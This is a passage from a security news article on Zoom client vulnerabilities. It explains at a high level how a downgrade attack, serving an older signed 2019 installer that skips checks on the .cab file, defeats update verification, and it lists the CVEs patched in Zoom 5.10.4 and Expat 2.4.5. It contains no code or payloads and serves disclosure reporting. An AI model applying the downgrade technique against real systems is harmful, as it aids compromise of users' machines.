Fratric ran into a snag here, though: The client downloads two files as part of the update process, and verifies their legitimacy — the "Installer.exe" file must be signed by "Zoom Video Communications, Inc." to start with; once installed, it checks the hash of the second .cab file.

However, it turns out that attackers can get around these hurdles with a downgrade attack.

"I served Installer.exe and .cab from Zoom version 4.4 (from mid-2019)," the researcher explained. "The installer for this version is still properly signed; however, it does not do any security checks on the .cab file."

**Patch Now**

In all, Fratric reported a total of six security vulnerabilities, including four Zoom-specific issues fixed in version 5.10.4 of the Zoom client:  

*   CVE-2022-22784 (improper XML parsing)
*   CVE-2022-22786 (update package downgrade),
*   CVE-2022-22787 (insufficient hostname validation​​),
*   CVE-2022-22785 (improperly constrained session cookies)

There's unfortunately also a software supply chain issue at work: The two others (CVE-2022-25235, CVE-2022-25236) affect the Expat parser, which is open source and used in plenty of other applications, including wares from Aruba, F5, IBM, and Oracle, as well as the Red Hat Linux distro. They're patched in Expat version 2.4.5.

"Some or all parts of the chain are likely applicable to other platforms," Fratric said.

Zoom became a popular target for "Zoom-bombing" and other attacks in the wake of the work-from-home wave during the pandemic, calling into question the security of the platform and its encryption practices. The company implemented a raft of security changes to match it's heightened status, but nonetheless, bugs like these are somewhat inevitable, researchers noted.

"In 2020, we all instantly became hyper-connected to the Internet…and so did all of the systems we use," Mark Lambert, vice president of products at ArmorCode, tells Dark Reading. "Two years later, and it is clear that there is no looking back. Unfortunately, these types of vulnerabilities are inevitable given the speed that software is released to meet business goals. The only way for us to protect ourselves is to detect as soon as possible and react even quicker."

Managing the volume of software vulnerabilities and alerts is a difficult challenge for developers, he notes. "The only way for them to keep up with the pace of delivery is to operationalize application security and embed it into their DevOps pipeline."

Tag

#rce